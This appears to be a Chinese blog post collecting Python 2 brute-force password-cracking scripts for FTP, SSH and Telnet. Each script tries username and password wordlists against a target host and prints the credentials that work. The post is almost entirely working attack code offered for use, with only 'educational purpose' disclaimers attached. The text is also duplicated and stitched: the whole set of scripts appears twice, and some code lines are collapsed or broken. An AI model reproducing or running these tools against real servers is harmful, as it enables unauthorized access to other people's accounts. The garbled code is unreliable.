0x01

FTP暴力破解脚本

Default

#!/usr/bin/env python

#-*-coding = utf-8-*-

#author:@xfk

#blog:@blog.sina.com.cn/kaiyongdeng

#date:@2012-05-08

import sys, os, time

from ftplib import FTP

docs = """

[*] This was written for educational purpose and pentest only. Use it at your own risk.

[*] Author will be not responsible for any damage!

[*] Toolname : ftp_bf.py

[*] Coder :

[*] Version : 0.1

[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt

"""

if sys.platform == 'linux' or sys.platform == 'linux2':

clearing = 'clear'

else:

clearing = 'cls'

os.system(clearing)

R = "\033[31m";

G = "\033[32m";

Y = "\033[33m"

END = "\033[0m"

def logo():

print G+"\n |---------------------------------------------------------------|"

print " | |"

print " | blog.sina.com.cn/kaiyongdeng |"

print " | 08/05/2012 ftp_bf.py v.0.1 |"

print " | FTP Brute Forcing Tool |"

print " | |"

print " |---------------------------------------------------------------|\n"

print " \n [-] %s\n" % time.strftime("%X")

print docs+END

def help():

print R+"[*]-t, --target ip/hostname <> Our target"

print "[*]-u, --usernamelist usernamelist <> usernamelist path"

print "[*]-p, --passwordlist passwordlist <> passwordlist path"

print "[*]-h, --help help <> print this help"

print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)

def bf_login(hostname,username,password):

# sys.stdout.write("\r[!]Checking : %s " % (p))

# sys.stdout.flush()

try:

ftp = FTP(hostname)

ftp.login(hostname,username, password)

ftp.retrlines('list')

ftp.quit()

print Y+"\n[!] w00t,w00t!!! We did it ! "

print "[+] Target : ",hostname, ""

print "[+] User : ",username, ""

print "[+] Password : ",password, ""+END

return 1

# sys.exit(1)

except Exception, e:

pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END

sys.exit(1)

def anon_login(hostname):

try:

print G+"\n[!] Checking for anonymous login.\n"+END

ftp = FTP(hostname) ftp.login()

ftp.retrlines('LIST')

print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END

ftp.quit()

except Exception, e:

print R+"\n[-] Anonymous login failed...\n"+END

pass

def main():

logo()

try:

for arg in sys.argv:

if arg.lower() == '-t' or arg.lower() == '--target':

hostname = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-u' or arg.lower() == '--usernamelist':

usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-p' or arg.lower() == '--passwordlist':

passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-h' or arg.lower() == '--help':

help()

elif len(sys.argv) <= 1:

help()

except:

print R+"[-]Cheak your parametars input\n"+END

help()

print G+"[!] BruteForcing target ..."+END

anon_login(hostname)

# print "here is ok"

# print hostname

try:

usernames = open(usernamelist, "r")

user = usernames.readlines()

count1 = 0

while count1 < len(user):

user[count1] = user[count1].strip()

count1 +=1

except:

print R+"\n[-] Cheak your usernamelist path\n"+END

sys.exit(1)

# print "here is ok ",usernamelist,passwordlist

try:

passwords = open(passwordlist, "r")

pwd = passwords.readlines()

count2 = 0

while count2 < len(pwd):

pwd[count2] = pwd[count2].strip()

count2 +=1

except:

print R+"\n[-] Check your passwordlist path\n"+END

sys.exit(1)

print G+"\n[+] Loaded:",len(user),"usernames"

print "\n[+] Loaded:",len(pwd),"passwords"

print "[+] Target:",hostname

print "[+] Guessing...\n"+END

for u in user: for p in pwd:

result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))

if result != 1:

print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END

else:

print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END

if not result :

print R+"\n[-]There is no username ans password enabled in the list."

print "[-]Exiting...\n"+END

if __name__ == "__main__":

main()

0x02

SSH暴力破解

Default

#!/usr/bin/env python

#-*-coding = UTF-8-*-

#author@:dengyongkai

#blog@:blog.sina.com.cn/kaiyongdeng

import sys

import os

import time

#from threading import Thread

try:

from paramiko import SSHClient

from paramiko import AutoAddPolicy

except ImportError:

print G+'''

You need paramiko module.

http://www.lag.net/paramiko/

Debian/Ubuntu: sudo apt-get install aptitude

: sudo aptitude install python-paramiko\n'''+END

sys.exit(1)

docs = """

[*] This was written for educational purpose and pentest only. Use it at your own risk.

[*] Author will be not responsible for any damage!

[*] Toolname : ssh_bf.py

[*] Author : xfk

[*] Version : v.0.2

[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]

"""

if sys.platform == 'linux' or sys.platform == 'linux2':

clearing = 'clear'

else:

clearing = 'cls'

os.system(clearing)

R = "\033[31m";

G = "\033[32m";

Y = "\033[33m"

END = "\033[0m"

def logo():

print G+"\n |---------------------------------------------------------------|"

print " | |"

print " | blog.sina.com.cn/kaiyongdeng |"

print " | 16/05/2012 ssh_bf.py v.0.2 |"

print " | SSH Brute Forcing Tool |"

print " | |"

print " |---------------------------------------------------------------|\n"

print " \n [-] %s\n" % time.ctime()

print docs+END

def help():

print Y+"[*]-H --hostname/ip <>the target hostname or ip address"

print "[*]-P --port <>the ssh service port(default is 22)"

print "[*]-U --usernamelist <>usernames list file"

print "[*]-P --passwordlist <>passwords list file"

print "[*]-H --help <>show help information"

print "[*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END

sys.exit(1)

def BruteForce(hostname,port,username,password):

'''

Create SSH connection to target

'''

ssh = SSHClient()

ssh.set_missing_host_key_policy(AutoAddPolicy())

try:

ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)

status = 'ok'

ssh.close()

except Exception, e:

status = 'error'

pass

return status

def makelist(file):

'''

Make usernames and passwords lists

'''

items = []

try:

fd = open(file, 'r')

except IOError:

print R+'unable to read file \'%s\'' % file+END

pass

except Exception, e:

print R+'unknown error'+END

pass

for line in fd.readlines():

item = line.replace('\n', '').replace('\r', '')

items.append(item)

fd.close()

return items

def main():

logo()

#print "hello wold"

try:

for arg in sys.argv:

if arg.lower() == '-t' or arg.lower() == '--target':

hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])

if arg.lower() == '-p' or arg.lower() == '--port':

port = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-u' or arg.lower() == '--userlist':

userlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-w' or arg.lower() == '--wordlist':

wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-h' or arg.lower() == '--help':

help()

elif len(sys.argv) <= 1:

help()

except:

print R+"[-]Cheak your parametars input\n"+END

help()

print G+"\n[!] BruteForcing target ...\n"+END

# print "here is ok"

# print hostname,port,wordlist,userlist

usernamelist = makelist(userlist)

passwordlist = makelist(wordlist)

print Y+"[*] SSH Brute Force Praparing."

print "[*] %s user(s) loaded." % str(len(usernamelist))

print "[*] %s password(s) loaded." % str(len(passwordlist))

print "[*] Brute Force Is Starting......."+END

try:

for username in usernamelist:

for password in passwordlist:

print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END

current = BruteForce(hostname, port, username, password)

if current == 'error':

print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END

# pass

else:

print G+"\n[+] ^-^ HaHa,We Got It!!!"

print "[+] username: %s" % username

print "[+] password: %s\n" % password+END

# sys.exit(0)

except:

print R+"\n[-] There Is Something Wrong,Pleace Cheak It."

print "[-] Exitting.....\n"+END

raise

print Y+"[+] Done.^-^\n"+END

sys.exit(0)

if __name__ == "__main__":

main()

0x03

TELNET密码暴力破解

Default

#!usr/bin/python

#Telnet Brute Forcer

#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, telnetlib

from copy import copy

if len(sys.argv) !=4:

print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"

sys.exit(1)

try:

users = open(sys.argv[2], "r").readlines()

except(IOError):

print "Error: Check your userlist path\n"

sys.exit(1)

try:

words = open(sys.argv[3], "r").readlines()

except(IOError):

print "Error: Check your wordlist path\n"

sys.exit(1)

print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"

print "\t--------------------------------------------------\n"

print "[+] Server:",sys.argv[1]

print "[+] Users Loaded:",len(users)

print "[+] Words Loaded:",len(words),"\n"

wordlist = copy(words)

def reloader():

for word in wordlist:

words.append(word)

def getword():

lock = threading.Lock()

lock.acquire()

if len(words) != 0:

value = random.sample(words, 1)

words.remove(value[0])

else:

print "\nReloading Wordlist - Changing User\n"

reloader()

value = random.sample(words, 1)

users.remove(users[0])

lock.release()

if len(users) ==1:

return value[0][:-1], users[0]

else:

return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):

value, user = getword()

try:

print "-"*12

print "User:",user,"Password:",value

tn = telnetlib.Telnet(sys.argv[1])

tn.read_until("login: ")

tn.write(user + "\n")

if password:

tn.read_until("Password: ")

tn.write(value + "\n")

tn.write("ls\n")

tn.write("exit\n")

print tn.read_all()

print "\t\nLogin successful:",value, user

tn.close()

work.join()

sys.exit(2)

except:

pass

for I in range(len(words)*len(users)):

work = Worker()

work.start()

time.sleep(1)渗透用的python脚本2之密码破解

0x00

在渗透测试当中，免不了要进行密码破解。以下为我搜集的一些python暴力破解脚本，并非原创作品，但有借鉴意义。

0x01

FTP暴力破解脚本

Default

#!/usr/bin/env python

#-*-coding = utf-8-*-

#author:@xfk

#blog:@blog.sina.com.cn/kaiyongdeng

#date:@2012-05-08

import sys, os, time

from ftplib import FTP

docs = """

[*] This was written for educational purpose and pentest only. Use it at your own risk.

[*] Author will be not responsible for any damage!

[*] Toolname : ftp_bf.py

[*] Coder :

[*] Version : 0.1

[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt

"""

if sys.platform == 'linux' or sys.platform == 'linux2':

clearing = 'clear'

else:

clearing = 'cls'

os.system(clearing)

R = "\033[31m";

G = "\033[32m";

Y = "\033[33m"

END = "\033[0m"

def logo():

print G+"\n |---------------------------------------------------------------|"

print " | |"

print " | blog.sina.com.cn/kaiyongdeng |"

print " | 08/05/2012 ftp_bf.py v.0.1 |"

print " | FTP Brute Forcing Tool |"

print " | |"

print " |---------------------------------------------------------------|\n"

print " \n [-] %s\n" % time.strftime("%X")

print docs+END

def help():

print R+"[*]-t, --target ip/hostname <> Our target"

print "[*]-u, --usernamelist usernamelist <> usernamelist path"

print "[*]-p, --passwordlist passwordlist <> passwordlist path"

print "[*]-h, --help help <> print this help"

print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)

def bf_login(hostname,username,password):

# sys.stdout.write("\r[!]Checking : %s " % (p))

# sys.stdout.flush()

try:

ftp = FTP(hostname)

ftp.login(hostname,username, password)

ftp.retrlines('list')

ftp.quit()

print Y+"\n[!] w00t,w00t!!! We did it ! "

print "[+] Target : ",hostname, ""

print "[+] User : ",username, ""

print "[+] Password : ",password, ""+END

return 1

# sys.exit(1)

except Exception, e:

pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END

sys.exit(1)

def anon_login(hostname):

try:

print G+"\n[!] Checking for anonymous login.\n"+END

ftp = FTP(hostname) ftp.login()

ftp.retrlines('LIST')

print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END

ftp.quit()

except Exception, e:

print R+"\n[-] Anonymous login failed...\n"+END

pass

def main():

logo()

try:

for arg in sys.argv:

if arg.lower() == '-t' or arg.lower() == '--target':

hostname = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-u' or arg.lower() == '--usernamelist':

usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-p' or arg.lower() == '--passwordlist':

passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-h' or arg.lower() == '--help':

help()

elif len(sys.argv) <= 1:

help()

except:

print R+"[-]Cheak your parametars input\n"+END

help()

print G+"[!] BruteForcing target ..."+END

anon_login(hostname)

# print "here is ok"

# print hostname

try:

usernames = open(usernamelist, "r")

user = usernames.readlines()

count1 = 0

while count1 < len(user):

user[count1] = user[count1].strip()

count1 +=1

except:

print R+"\n[-] Cheak your usernamelist path\n"+END

sys.exit(1)

# print "here is ok ",usernamelist,passwordlist

try:

passwords = open(passwordlist, "r")

pwd = passwords.readlines()

count2 = 0

while count2 < len(pwd):

pwd[count2] = pwd[count2].strip()

count2 +=1

except:

print R+"\n[-] Check your passwordlist path\n"+END

sys.exit(1)

print G+"\n[+] Loaded:",len(user),"usernames"

print "\n[+] Loaded:",len(pwd),"passwords"

print "[+] Target:",hostname

print "[+] Guessing...\n"+END

for u in user: for p in pwd:

result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))

if result != 1:

print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END

else:

print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END

if not result :

print R+"\n[-]There is no username ans password enabled in the list."

print "[-]Exiting...\n"+END

if __name__ == "__main__":

main()

0x02

SSH暴力破解

Default

#!/usr/bin/env python

#-*-coding = UTF-8-*-

#author@:dengyongkai

#blog@:blog.sina.com.cn/kaiyongdeng

import sys

import os

import time

#from threading import Thread

try:

from paramiko import SSHClient

from paramiko import AutoAddPolicy

except ImportError:

print G+'''

You need paramiko module.

http://www.lag.net/paramiko/

Debian/Ubuntu: sudo apt-get install aptitude

: sudo aptitude install python-paramiko\n'''+END

sys.exit(1)

docs = """

[*] This was written for educational purpose and pentest only. Use it at your own risk.

[*] Author will be not responsible for any damage!

[*] Toolname : ssh_bf.py

[*] Author : xfk

[*] Version : v.0.2

[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]

"""

if sys.platform == 'linux' or sys.platform == 'linux2':

clearing = 'clear'

else:

clearing = 'cls'

os.system(clearing)

R = "\033[31m";

G = "\033[32m";

Y = "\033[33m"

END = "\033[0m"

def logo():

print G+"\n |---------------------------------------------------------------|"

print " | |"

print " | blog.sina.com.cn/kaiyongdeng |"

print " | 16/05/2012 ssh_bf.py v.0.2 |"

print " | SSH Brute Forcing Tool |"

print " | |"

print " |---------------------------------------------------------------|\n"

print " \n [-] %s\n" % time.ctime()

print docs+END

def help():

print Y+"[*]-H --hostname/ip <>the target hostname or ip address"

print "[*]-P --port <>the ssh service port(default is 22)"

print "[*]-U --usernamelist <>usernames list file"

print "[*]-P --passwordlist <>passwords list file"

print "[*]-H --help <>show help information"

print "[*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END

sys.exit(1)

def BruteForce(hostname,port,username,password):

'''

Create SSH connection to target

'''

ssh = SSHClient()

ssh.set_missing_host_key_policy(AutoAddPolicy())

try:

ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)

status = 'ok'

ssh.close()

except Exception, e:

status = 'error'

pass

return status

def makelist(file):

'''

Make usernames and passwords lists

'''

items = []

try:

fd = open(file, 'r')

except IOError:

print R+'unable to read file \'%s\'' % file+END

pass

except Exception, e:

print R+'unknown error'+END

pass

for line in fd.readlines():

item = line.replace('\n', '').replace('\r', '')

items.append(item)

fd.close()

return items

def main():

logo()

#print "hello wold"

try:

for arg in sys.argv:

if arg.lower() == '-t' or arg.lower() == '--target':

hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])

if arg.lower() == '-p' or arg.lower() == '--port':

port = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-u' or arg.lower() == '--userlist':

userlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-w' or arg.lower() == '--wordlist':

wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]

elif arg.lower() == '-h' or arg.lower() == '--help':

help()

elif len(sys.argv) <= 1:

help()

except:

print R+"[-]Cheak your parametars input\n"+END

help()

print G+"\n[!] BruteForcing target ...\n"+END

# print "here is ok"

# print hostname,port,wordlist,userlist

usernamelist = makelist(userlist)

passwordlist = makelist(wordlist)

print Y+"[*] SSH Brute Force Praparing."

print "[*] %s user(s) loaded." % str(len(usernamelist))

print "[*] %s password(s) loaded." % str(len(passwordlist))

print "[*] Brute Force Is Starting......."+END

try:

for username in usernamelist:

for password in passwordlist:

print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END

current = BruteForce(hostname, port, username, password)

if current == 'error':

print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END

# pass

else:

print G+"\n[+] ^-^ HaHa,We Got It!!!"

print "[+] username: %s" % username

print "[+] password: %s\n" % password+END

# sys.exit(0)

except:

print R+"\n[-] There Is Something Wrong,Pleace Cheak It."

print "[-] Exitting.....\n"+END

raise

print Y+"[+] Done.^-^\n"+END

sys.exit(0)

if __name__ == "__main__":

main()

0x03

TELNET密码暴力破解

Default

#!usr/bin/python

#Telnet Brute Forcer

#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, telnetlib

from copy import copy

if len(sys.argv) !=4:

print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"

sys.exit(1)

try:

users = open(sys.argv[2], "r").readlines()

except(IOError):

print "Error: Check your userlist path\n"

sys.exit(1)

try:

words = open(sys.argv[3], "r").readlines()

except(IOError):

print "Error: Check your wordlist path\n"

sys.exit(1)

print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"

print "\t--------------------------------------------------\n"

print "[+] Server:",sys.argv[1]

print "[+] Users Loaded:",len(users)

print "[+] Words Loaded:",len(words),"\n"

wordlist = copy(words)

def reloader():

for word in wordlist:

words.append(word)

def getword():

lock = threading.Lock()

lock.acquire()

if len(words) != 0:

value = random.sample(words, 1)

words.remove(value[0])

else:

print "\nReloading Wordlist - Changing User\n"

reloader()

value = random.sample(words, 1)

users.remove(users[0])

lock.release()

if len(users) ==1:

return value[0][:-1], users[0]

else:

return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

def run(self):

value, user = getword()

try:

print "-"*12

print "User:",user,"Password:",value

tn = telnetlib.Telnet(sys.argv[1])

tn.read_until("login: ")

tn.write(user + "\n")

if password:

tn.read_until("Password: ")

tn.write(value + "\n")

tn.write("ls\n")

tn.write("exit\n")

print tn.read_all()

print "\t\nLogin successful:",value, user

tn.close()

work.join()

sys.exit(2)

except:

pass

for I in range(len(words)*len(users)):

work = Worker()

work.start()

time.sleep(1)